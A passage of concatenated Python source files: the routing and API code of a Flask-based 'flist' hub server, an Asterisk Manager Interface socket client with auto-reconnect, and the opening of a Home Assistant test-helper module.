return internalRedirect("upload.html", response['message'])
"""
return internalRedirect("upload.html")
@app.route('/upload-flist', methods=['GET', 'POST'])
@hub.security.protected()
def upload_file_flist():
username = session['username']
if request.method == 'POST':
response = api_flist_upload(request, username, validate=True)
if response['status'] == 'success':
return uploadSuccess(response['flist'], response['stats'], response['home'])
if response['status'] == 'error':
return internalRedirect("upload-flist.html", response['message'])
return internalRedirect("upload-flist.html")
@app.route('/merge', methods=['GET', 'POST'])
@hub.security.protected()
def flist_merge():
username = session['username']
if request.method == 'POST':
data = flist_merge_post()
print(data)
if data['error']:
return internalRedirect("merge.html", data['error'])
flist = HubPublicFlist(config, username, data['target'])
status = flist.merge(data['sources'])
        if status is not True:
variables = {'error': status}
return globalTemplate("merge.html", variables)
return uploadSuccess(data['target'], 0, data['target'])
# Merge page
return internalRedirect("merge.html")
@app.route('/docker-convert', methods=['GET', 'POST'])
@hub.security.protected()
def docker_handler():
username = session['username']
if request.method == 'POST':
if not request.form.get("docker-input"):
return internalRedirect("docker.html", "missing docker image name")
docker = HubDocker(config, announcer)
print("[+] docker converter id: %s" % docker.jobid)
job = threading.Thread(target=docker.convert, args=(request.form.get("docker-input"), username, ))
job.start()
return internalRedirect("docker-progress.html", None, {'jobid': docker.jobid})
# Docker page
return internalRedirect("docker.html")
######################################
#
# ROUTING NAVIGATION
#
######################################
@app.route('/')
def show_users():
return globalTemplate("users.html", {})
@app.route('/<username>')
def show_user(username):
flist = HubPublicFlist(config, username, "unknown")
if not flist.user_exists:
abort(404)
return globalTemplate("user.html", {'targetuser': username})
@app.route('/<username>/<flist>.md')
def show_flist_md(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.file_exists:
abort(404)
variables = {
'targetuser': username,
'flistname': flist.filename,
'flisturl': "%s/%s/%s" % (config['public-website'], username, flist.filename),
'ardbhost': 'zdb://%s:%d' % (config['backend-public-host'], config['backend-public-port']),
'checksum': flist.checksum
}
return globalTemplate("preview.html", variables)
@app.route('/<username>/<flist>.txt')
def show_flist_txt(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.file_exists:
abort(404)
text = "File: %s\n" % flist.filename
text += "Uploader: %s\n" % username
text += "Source: %s/%s/%s\n" % (config['public-website'], username, flist.filename)
text += "Storage: zdb://%s:%d\n" % (config['backend-public-host'], config['backend-public-port'])
text += "Checksum: %s\n" % flist.checksum
response = make_response(text)
response.headers["Content-Type"] = "text/plain"
return response
@app.route('/<username>/<flist>.json')
def show_flist_json(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.file_exists:
abort(404)
data = {
'flist': flist,
'uploader': username,
'source': "%s/%s/%s" % (config['public-website'], username, flist),
'storage': "zdb://%s:%d" % (config['backend-public-host'], config['backend-public-port']),
'checksum': flist.checksum
}
response = make_response(json.dumps(data) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/<username>/<flist>.flist')
def download_flist(username, flist):
flist = HubPublicFlist(config, username, flist)
return send_from_directory(directory=flist.user_path, filename=flist.filename)
@app.route('/<username>/<flist>.flist.md5')
def checksum_flist(username, flist):
flist = HubPublicFlist(config, username, flist)
hash = flist.checksum
if not hash:
abort(404)
response = make_response(hash + "\n")
response.headers["Content-Type"] = "text/plain"
return response
@app.route('/search')
def search_flist():
return globalTemplate("search.html", {})
######################################
#
# ROUTING API
#
######################################
#
# Public API
#
@app.route('/api/flist')
def api_list():
repositories = api_repositories()
output = []
for user in repositories:
target = os.path.join(config['public-directory'], user['name'])
# ignore files (eg: .keep file)
if not os.path.isdir(target):
continue
flists = sorted(os.listdir(target))
for flist in flists:
output.append("%s/%s" % (user['name'], flist))
response = make_response(json.dumps(output) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/fileslist')
def api_list_files():
fileslist = api_fileslist()
response = make_response(json.dumps(fileslist) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/repositories')
def api_list_repositories():
repositories = api_repositories()
response = make_response(json.dumps(repositories) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/<username>')
def api_user_contents(username):
flist = HubPublicFlist(config, username, "unknown")
if not flist.user_exists:
abort(404)
    # note: this call resolves to the two-argument helper api_user_contents(username, userpath)
    # defined further below, which rebinds this module-level name after the routes are registered
    contents = api_user_contents(username, flist.user_path)
response = make_response(json.dumps(contents) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/<username>/<flist>', methods=['GET', 'INFO'])
def api_inspect(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
if request.method == 'GET':
contents = api_contents(flist)
if request.method == 'INFO':
contents = api_flist_info(flist)
response = make_response(json.dumps(contents) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/<username>/<flist>/light', methods=['GET'])
def api_inspect_light(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
contents = api_flist_info(flist)
response = make_response(json.dumps(contents) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/<username>/<flist>/metadata')
def api_readme(username, flist):
flist = HubPublicFlist(config, username, flist)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
readme = api_flist_md(flist)
response = make_response(json.dumps(readme) + "\n")
response.headers["Content-Type"] = "application/json"
return response
@app.route('/api/flist/me', methods=['GET'])
@hub.security.apicall()
def api_my_myself():
username = session['username']
return api_response(extra={"username": username})
@app.route('/api/flist/me/<flist>', methods=['GET', 'DELETE'])
@hub.security.apicall()
def api_my_inspect(flist):
username = session['username']
if request.method == 'DELETE':
return api_delete(username, flist)
return api_inspect(username, flist)
@app.route('/api/flist/me/<source>/link/<linkname>', methods=['GET'])
@hub.security.apicall()
def api_my_symlink(source, linkname):
username = session['username']
return api_symlink(username, source, linkname)
@app.route('/api/flist/me/<linkname>/crosslink/<repository>/<sourcename>', methods=['GET'])
@hub.security.apicall()
def api_my_crosssymlink(linkname, repository, sourcename):
username = session['username']
return api_cross_symlink(username, repository, sourcename, linkname)
@app.route('/api/flist/me/<source>/rename/<destination>')
@hub.security.apicall()
def api_my_rename(source, destination):
username = session['username']
flist = HubPublicFlist(config, username, source)
destflist = HubPublicFlist(config, username, destination)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
os.rename(flist.target, destflist.target)
return api_response()
@app.route('/api/flist/me/promote/<sourcerepo>/<sourcefile>/<localname>', methods=['GET'])
@hub.security.apicall()
def api_my_promote(sourcerepo, sourcefile, localname):
username = session['username']
return api_promote(username, sourcerepo, sourcefile, localname)
@app.route('/api/flist/me/upload', methods=['POST'])
@hub.security.apicall()
def api_my_upload():
username = session['username']
response = api_flist_upload(request, username)
if response['status'] == 'success':
if config['debug']:
return api_response(extra={'name': response['flist'], 'files': response['stats'], 'timing': {}})
else:
return api_response(extra={'name': response['flist'], 'files': response['stats']})
if response['status'] == 'error':
return api_response(response['message'], 500)
@app.route('/api/flist/me/upload-flist', methods=['POST'])
@hub.security.apicall()
def api_my_upload_flist():
username = session['username']
response = api_flist_upload(request, username, validate=True)
if response['status'] == 'success':
if config['debug']:
return api_response(extra={'name': response['flist'], 'files': response['stats'], 'timing': {}})
else:
return api_response(extra={'name': response['flist'], 'files': response['stats']})
if response['status'] == 'error':
return api_response(response['message'], 500)
@app.route('/api/flist/me/merge/<target>', methods=['POST'])
@hub.security.apicall()
def api_my_merge(target):
username = session['username']
sources = request.get_json(silent=True, force=True)
data = flist_merge_data(sources, target)
    if data['error'] is not None:
return api_response(data['error'], 500)
flist = HubPublicFlist(config, username, data['target'])
status = flist.merge(data['sources'])
    if status is not True:
return api_response(status, 500)
return api_response()
@app.route('/api/flist/me/docker', methods=['POST'])
@hub.security.apicall()
def api_my_docker():
username = session['username']
if not request.form.get("image"):
return api_response("missing docker image name", 400)
docker = HubDocker(config, announcer)
response = docker.convert(request.form.get("image"), username)
if response['status'] == 'success':
return api_response(extra={'name': response['flist']})
if response['status'] == 'error':
return api_response(response['message'], 500)
return api_response("unexpected docker convert error", 500)
######################################
#
# API IMPLEMENTATION
#
######################################
def api_delete(username, source):
flist = HubPublicFlist(config, username, source)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
os.unlink(flist.target)
return api_response()
def api_symlink(username, source, linkname):
flist = HubPublicFlist(config, username, source)
linkflist = HubPublicFlist(config, username, linkname)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
# remove previous symlink if existing
if os.path.islink(linkflist.target):
os.unlink(linkflist.target)
# if it was not a link but a regular file, we don't overwrite
    # existing flist, we only allow updating links
if os.path.isfile(linkflist.target):
return api_response("link destination is already a file", 401)
cwd = os.getcwd()
os.chdir(flist.user_path)
os.symlink(flist.filename, linkflist.filename)
os.chdir(cwd)
return api_response()
def api_cross_symlink(username, repository, sourcename, linkname):
flist = HubPublicFlist(config, repository, sourcename)
linkflist = HubPublicFlist(config, username, linkname)
if not flist.user_exists:
return api_response("source repository not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
# remove previous symlink if existing
if os.path.islink(linkflist.target):
os.unlink(linkflist.target)
# if it was not a link but a regular file, we don't overwrite
    # existing flist, we only allow updating links
if os.path.isfile(linkflist.target):
return api_response("link destination is already a file", 401)
cwd = os.getcwd()
os.chdir(linkflist.user_path)
os.symlink("../" + flist.username + "/" + flist.filename, linkflist.filename)
os.chdir(cwd)
return api_response()
def api_promote(username, sourcerepo, sourcefile, targetname):
flist = HubPublicFlist(config, sourcerepo, sourcefile)
destination = HubPublicFlist(config, username, targetname)
if not flist.user_exists:
return api_response("user not found", 404)
if not flist.file_exists:
return api_response("source not found", 404)
# ensure target exists
if not destination.user_exists:
destination.user_create()
# remove previous file if existing
if os.path.exists(destination.target):
os.unlink(destination.target)
print("[+] promote: %s -> %s" % (flist.target, destination.target))
shutil.copy(flist.target, destination.target)
status = {
'source': {
'username': flist.username,
'filename': flist.filename,
},
'destination': {
'username': destination.username,
'filename': destination.filename,
}
}
return api_response(extra=status)
def api_flist_upload(request, username, validate=False):
# check if the post request has the file part
if 'file' not in request.files:
return {'status': 'error', 'message': 'no file found'}
file = request.files['file']
    # if the user does not select a file, the browser may also
    # submit an empty part without a filename
if file.filename == '':
return {'status': 'error', 'message': 'no file selected'}
if not allowed_file(file.filename, validate):
return {'status': 'error', 'message': 'this file is not allowed'}
#
# processing the file
#
filename = secure_filename(file.filename)
print("[+] saving file")
source = os.path.join(config['upload-directory'], filename)
file.save(source)
cleanfilename = file_from_flist(filename)
flist = HubPublicFlist(config, username, cleanfilename)
flist.user_create()
# it's a new flist, let's do the normal flow
if not validate:
workspace = flist.raw.workspace()
flist.raw.unpack(source, workspace.name)
stats = flist.raw.create(workspace.name, flist.target)
# we have an existing flist and checking contents
# we don't need to create the flist, we just ensure the
# contents is on the backend
else:
flist.loads(source)
stats = flist.validate()
if stats['response']['failure'] > 0:
return {'status': 'error', 'message': 'unauthorized upload, contents is not fully present on backend'}
flist.commit()
# removing uploaded source file
os.unlink(source)
return {'status': 'success', 'flist': flist.filename, 'home': username, 'stats': stats, 'timing': {}}
def api_flist_upload_prepare(request, username, validate=False):
# check if the post request has the file part
if 'file' not in request.files:
return {'status': 'error', 'message': 'no file found'}
file = request.files['file']
    # if the user does not select a file, the browser may also
    # submit an empty part without a filename
if file.filename == '':
return {'status': 'error', 'message': 'no file selected'}
if not allowed_file(file.filename, validate):
return {'status': 'error', 'message': 'this file is not allowed'}
#
# processing the file
#
filename = secure_filename(file.filename)
print("[+] saving file")
source = os.path.join(config['upload-directory'], filename)
file.save(source)
cleanfilename = file_from_flist(filename)
flist = HubPublicFlist(config, username, cleanfilename, announcer)
flist.raw.newtask()
print("[+] flist creation id: %s" % flist.raw.jobid)
job = threading.Thread(target=flist.create, args=(source, ))
job.start()
return {'status': 'success', 'jobid': flist.raw.jobid}
"""
print(flist.raw.jobid)
flist.user_create()
# it's a new flist, let's do the normal flow
if not validate:
workspace = flist.raw.workspace()
flist.raw.unpack(source, workspace.name)
stats = flist.raw.create(workspace.name, flist.target)
# we have an existing flist and checking contents
# we don't need to create the flist, we just ensure the
# contents is on the backend
else:
flist.loads(source)
stats = flist.validate()
if stats['response']['failure'] > 0:
return {'status': 'error', 'message': 'unauthorized upload, contents is not fully present on backend'}
flist.commit()
# removing uploaded source file
os.unlink(source)
return {'status': 'success', 'flist': flist.filename, 'home': username, 'stats': stats, 'timing': {}}
"""
def api_repositories():
output = []
try:
root = sorted(os.listdir(config['public-directory']))
except FileNotFoundError as e:
print(e)
root = []
for user in root:
target = os.path.join(config['public-directory'], user)
# ignore files (eg: .keep file)
if not os.path.isdir(target):
continue
official = (user in config['official-repositories'])
output.append({'name': user, 'official': official})
return output
def clean_symlink(linkname):
return linkname.replace("../", "")
def api_user_contents(username, userpath):
files = sorted(os.listdir(userpath))
contents = []
for file in files:
filepath = os.path.join(config['public-directory'], username, file)
stat = os.lstat(filepath)
if S_ISLNK(stat.st_mode):
target = os.readlink(filepath)
tstat = stat
if os.path.exists(filepath):
tstat = os.stat(filepath)
contents.append({
'name': file,
'size': "%.2f KB" % ((tstat.st_size) / 1024),
'updated': int(tstat.st_mtime),
'linktime': int(stat.st_mtime),
'type': 'symlink',
'target': clean_symlink(target),
})
else:
contents.append({
'name': file,
'size': "%.2f KB" % ((stat.st_size) / 1024),
'updated': int(stat.st_mtime),
'type': 'regular',
})
return contents
def api_fileslist():
repositories = api_repositories()
fileslist = {}
for repository in repositories:
flist = HubPublicFlist(config, repository['name'], "unknown")
contents = api_user_contents(flist.username, flist.user_path)
fileslist[repository['name']] = contents
return fileslist
def api_contents(flist):
flist.loads(flist.target)
contents = flist.contents()
return contents["response"]
def api_flist_md(flist):
flist.loads(flist.target)
response = flist.allmetadata()
return response
def api_flist_info(flist):
stat = os.lstat(flist.target)
file = os.path.basename(flist.target)
contents = {
'name': file,
'size': stat.st_size,
'updated': int(stat.st_mtime),
'type': 'regular',
'md5': flist.checksum,
}
if S_ISLNK(stat.st_mode):
target = os.readlink(flist.target)
tstat = stat
if os.path.exists(flist.target):
tstat = os.stat(flist.target)
contents['type'] = 'symlink'
contents['updated'] = int(tstat.st_mtime)
contents['linktime'] = int(stat.st_mtime)
contents['target'] = target
contents['size'] = tstat.st_size
return contents
def api_response(error=None, code=200, extra=None):
reply = {"status": "success"}
if error:
reply = {"status": "error", "message": error}
if extra:
reply['payload'] = extra
response = make_response(json.dumps(reply) + "\n", code)
response.headers["Content-Type"] = "application/json"
return response
#
# notification subsystem (server-sent event)
#
@app.route('/listen/<id>', methods=['GET'])
def listen(id):
print("[+] listening id: %s" % id)
def stream():
messages = announcer.listen(id)
while True:
msg = messages.get()
# reaching None means there is nothing more expected
# on this job, we can clean it up
            if msg is None:
announcer.terminate(id)
return
yield msg
messages = announcer.listen(id)
    if messages is None:
return announcer.error("job id not found"), 404
return Response(stream(), mimetype='text/event-stream')
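# Hedged client-side sketch: the job id returned by the upload or docker-convert flows
# can be followed with any SSE-capable client (hostname below is a placeholder):
#   curl -N https://hub.example.org/listen/<jobid>
# The stream ends once the announcer signals that the job has no more events.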
######################################
#
# PROCESSING
#
######################################
print("[+] listening")
app.run(host="0.0.0.0", port=5555, debug=config['debug'], threaded=True)
|
client.py
|
import re
import socket
import threading
from functools import partial
from .action import Action, LoginAction, LogoffAction, SimpleAction
from .event import Event, EventListener
from .response import Response, FutureResponse
import logging
import sys, traceback
_logger = logging.getLogger(__name__)
try:
unicode = unicode
except NameError:
str = str
unicode = str
bytes = bytes
basestring = (str, bytes)
else:
str = str
unicode = unicode
bytes = str
basestring = basestring
NOOP = lambda *args, **kwargs: None
NOOP_LISTENER = dict(
on_action=NOOP,
on_response=NOOP,
on_event=NOOP,
on_connect=NOOP,
on_disconnect=NOOP,
on_unknown=NOOP,
)
class AMIClientListener(object):
methods = ['on_action', 'on_response', 'on_event', 'on_connect', 'on_disconnect', 'on_unknown']
def __init__(self, **kwargs):
for k, v in kwargs.items():
if k not in self.methods:
raise TypeError('\'%s\' is an invalid keyword argument for this function' % k)
setattr(self, k, v)
def on_action(self, source, action):
raise NotImplementedError()
def on_response(self, source, response):
raise NotImplementedError()
def on_event(self, source, event):
raise NotImplementedError()
def on_connect(self, source):
raise NotImplementedError()
def on_disconnect(self, source, error=None):
raise NotImplementedError()
def on_unknown(self, source, pack):
raise NotImplementedError()
class AMIClient(object):
    asterisk_start_regex = re.compile(r'^Asterisk *Call *Manager/(?P<version>([0-9]+\.)*[0-9]+)', re.IGNORECASE)
asterisk_line_regex = re.compile(b'\r\n', re.IGNORECASE | re.MULTILINE)
asterisk_pack_regex = re.compile(b'\r\n\r\n', re.IGNORECASE | re.MULTILINE)
def __init__(self, address='127.0.0.1', port=5038,
encoding='utf-8', timeout=3, buffer_size=2 ** 10,
**kwargs):
self._action_counter = 0
self._futures = {}
self._listeners = []
self._event_listeners = []
self._address = address
self._buffer_size = buffer_size
self._port = port
self._socket = None
self._thread = None
self.finished = None
self._ami_version = None
self._timeout = timeout
self.encoding = encoding
if len(kwargs) > 0:
self.add_listener(**kwargs)
def next_action_id(self):
id = self._action_counter
self._action_counter += 1
return str(id)
def connect(self):
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.settimeout(5)
self._socket.connect((self._address, self._port))
self.finished = threading.Event()
self._thread = threading.Thread(target=self.listen)
self._thread.daemon = True
self._thread.start()
def _fire_on_connect(self, **kwargs):
for listener in self._listeners:
listener.on_connect(source=self, **kwargs)
def _fire_on_disconnect(self, **kwargs):
for listener in self._listeners:
listener.on_disconnect(source=self, **kwargs)
def _fire_on_response(self, **kwargs):
for listener in self._listeners:
listener.on_response(source=self, **kwargs)
def _fire_on_action(self, **kwargs):
for listener in self._listeners:
listener.on_action(source=self, **kwargs)
def _fire_on_event(self, **kwargs):
for listener in self._listeners:
listener.on_event(source=self, **kwargs)
def _fire_on_unknown(self, **kwargs):
for listener in self._listeners:
listener.on_unknown(source=self, **kwargs)
def disconnect(self):
self.finished.set()
try:
self._socket.close()
self._thread.join()
except:
pass
def login(self, username, secret, callback=None):
if self.finished is None or self.finished.is_set():
self.connect()
return self.send_action(LoginAction(username, secret), callback)
def logoff(self, callback=None):
if self.finished is None or self.finished.is_set():
return
return self.send_action(LogoffAction(), callback)
def send_action(self, action, callback=None):
if 'ActionID' not in action.keys:
action_id = self.next_action_id()
action.keys['ActionID'] = action_id
else:
action_id = action.keys['ActionID']
future = FutureResponse(callback, self._timeout)
self._futures[action_id] = future
self._fire_on_action(action=action)
self.send(action)
return future
def send(self, pack):
self._socket.send(bytearray(unicode(pack) + '\r\n', self.encoding))
def _decode_pack(self, pack):
return pack.decode(self.encoding)
def _next_pack(self):
data = b''
while not self.finished.is_set():
recv = self._socket.recv(self._buffer_size)
if recv == b'':
_logger.info("Did receive empty string in first iter!")
self.finished.set()
continue
data += recv
if self.asterisk_line_regex.search(data):
(pack, data) = self.asterisk_line_regex.split(data, 1)
yield self._decode_pack(pack)
break
while not self.finished.is_set():
while self.asterisk_pack_regex.search(data):
(pack, data) = self.asterisk_pack_regex.split(data, 1)
yield self._decode_pack(pack)
recv = self._socket.recv(self._buffer_size)
if recv == b'':
_logger.info("Did receive empty string in second iter!")
self.finished.set()
continue
data += recv
self._socket.close()
def listen(self):
try:
pack_generator = self._next_pack()
asterisk_start = next(pack_generator)
match = AMIClient.asterisk_start_regex.match(asterisk_start)
if not match:
raise Exception("Asterisk Start Exception")
self._ami_version = match.group('version')
self._fire_on_connect()
        except Exception as e:
_logger.error("Exception on first packet: %s", e)
self._fire_on_disconnect(error=e)
try:
while not self.finished.is_set():
pack = next(pack_generator)
self.fire_recv_pack(pack)
self._fire_on_disconnect(error=None)
except Exception as ex:
_logger.info("Got Exception: %s", ex)
self._fire_on_disconnect(error=ex)
def fire_recv_reponse(self, response):
self._fire_on_response(response=response)
if response.status.lower() == 'goodbye':
self.finished.set()
if 'ActionID' not in response.keys:
return
action_id = response.keys['ActionID']
if action_id not in self._futures:
return
future = self._futures.pop(action_id)
future.response = response
def fire_recv_event(self, event):
self._fire_on_event(event=event)
for listener in self._event_listeners:
listener(event=event, source=self)
def fire_recv_pack(self, pack):
if Response.match(pack):
response = Response.read(pack)
self.fire_recv_reponse(response)
return
if Event.match(pack):
event = Event.read(pack)
self.fire_recv_event(event)
return
self._fire_on_unknown(pack=pack)
def add_listener(self, listener=None, **kwargs):
if not listener:
default = NOOP_LISTENER.copy()
default.update(kwargs)
listener = AMIClientListener(**default)
self._listeners.append(listener)
return listener
def remove_listener(self, listener):
self._listeners.remove(listener)
return listener
def add_event_listener(self, on_event=None, **kwargs):
if len(kwargs) > 0 and not isinstance(on_event, EventListener):
event_listener = EventListener(on_event=on_event, **kwargs)
else:
event_listener = on_event
self._event_listeners.append(event_listener)
return event_listener
def remove_event_listener(self, event_listener):
self._event_listeners.remove(event_listener)
class AMIClientAdapter(object):
def __init__(self, ami_client):
self._ami_client = ami_client
    def _action(self, name, _callback=None, variables=None, **kwargs):
        action = Action(name, kwargs)
        # use a fresh dict instead of a shared mutable default argument
        action.variables = variables if variables is not None else {}
return self._ami_client.send_action(action, _callback)
def __getattr__(self, item):
return partial(self._action, item)
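# Hedged usage sketch (host, credentials and channel values are placeholders):
#   client = AMIClient(address='127.0.0.1', port=5038)
#   client.login(username='admin', secret='secret')
#   adapter = AMIClientAdapter(client)
#   future = adapter.Originate(Channel='SIP/100', Exten='101', Context='default', Priority=1)
#   print(future.response)  # populated once the response with the matching ActionID arrives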
class AutoReconnect(threading.Thread):
def __init__(self, ami_client, delay=0.5,
on_disconnect=lambda *args: None, on_reconnect=lambda *args: None):
super(AutoReconnect, self).__init__()
self.on_reconnect = on_reconnect
self.on_disconnect = on_disconnect
self.delay = delay
self.finished = None
self._ami_client = ami_client
self._login_args = None
self._login = None
self._logoff = None
self._prepare_client()
def _prepare_client(self):
self._login = self._ami_client.login
self._logoff = self._ami_client.logoff
self._ami_client.login = self._login_wrapper
self._ami_client.logoff = self._logoff_wrapper
def _rollback_client(self):
self._ami_client.login = self._login
self._ami_client.logoff = self._logoff
def _login_wrapper(self, *args, **kwargs):
callback = kwargs.pop('callback', None) or (lambda *a, **k: None)
def on_login(response, *a, **k):
if not response.is_error():
if self._login_args is None:
self.finished = threading.Event()
self.start()
self._login_args = (args, kwargs)
callback(response, *a, **k)
kwargs['callback'] = on_login
return self._login(*args, **kwargs)
def _logoff_wrapper(self, *args, **kwargs):
self.finished.set()
self._rollback_client()
return self._logoff(*args, **kwargs)
def ping(self):
try:
f = self._ami_client.send_action(Action('Ping'))
response = f.response
if response is not None and not response.is_error():
_logger.info("PING success")
return True
_logger.error("PING failed")
self._ami_client.disconnect()
self.on_disconnect(self._ami_client, response)
except Exception as ex:
_logger.error("PING failed. %s", ex)
self._ami_client.disconnect()
self.on_disconnect(self._ami_client, ex)
return False
def try_reconnect(self):
try:
f = self._login(*self._login_args[0], **self._login_args[1])
response = f.response
if response is not None and not response.is_error():
self.on_reconnect(self._ami_client, response)
return True
except:
pass
return False
def run(self):
self.finished.wait(self.delay)
while not self.finished.is_set():
if not self.ping():
self.try_reconnect()
self.finished.wait(self.delay)
def __del__(self):
self._rollback_client()
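# Hedged usage sketch: wrap an existing client so that a failed Ping triggers a re-login
# with the last used credentials (values below are placeholders):
#   client = AMIClient(address='127.0.0.1', port=5038)
#   reconnect = AutoReconnect(client, delay=5, on_reconnect=lambda c, r: _logger.info("reconnected"))
#   client.login(username='admin', secret='secret')  # the watchdog thread starts after the first successful login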
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import sys
import threading
import time
import uuid
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
ATTR_DISCOVERED,
ATTR_SERVICE,
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_PLATFORM_DISCOVERED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.yaml.loader as yaml_loader
from tests.async_mock import AsyncMock, Mock, patch
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)
).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return asyncio.run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop
).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), "testing_config", *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
async def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {}, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
orig_async_add_executor_job = hass.async_add_executor_job
orig_async_create_task = hass.async_create_task
def async_add_job(target, *args):
"""Add job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock) and not isinstance(target, AsyncMock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_job(target, *args)
def async_add_executor_job(target, *args):
"""Add executor job."""
check_target = target
while isinstance(check_target, ft.partial):
check_target = check_target.func
if isinstance(check_target, Mock):
fut = asyncio.Future()
fut.set_result(target(*args))
return fut
return orig_async_add_executor_job(target, *args)
def async_create_task(coroutine):
"""Create task."""
if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock):
fut = asyncio.Future()
fut.set_result(None)
return fut
return orig_async_create_task(coroutine)
hass.async_add_job = async_add_job
hass.async_add_executor_job = async_add_executor_job
hass.async_create_task = async_create_task
hass.config.location_name = "test home"
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone("US/Pacific")
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
async def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch("homeassistant.core._async_create_timer"), patch.object(
hass, "async_stop_track_tasks"
):
await orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
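# Hedged usage sketch inside a test (domain and service names are arbitrary):
#   calls = async_mock_service(hass, "light", "turn_on")
#   ... exercise the code under test ...
#   assert len(calls) == 1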
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
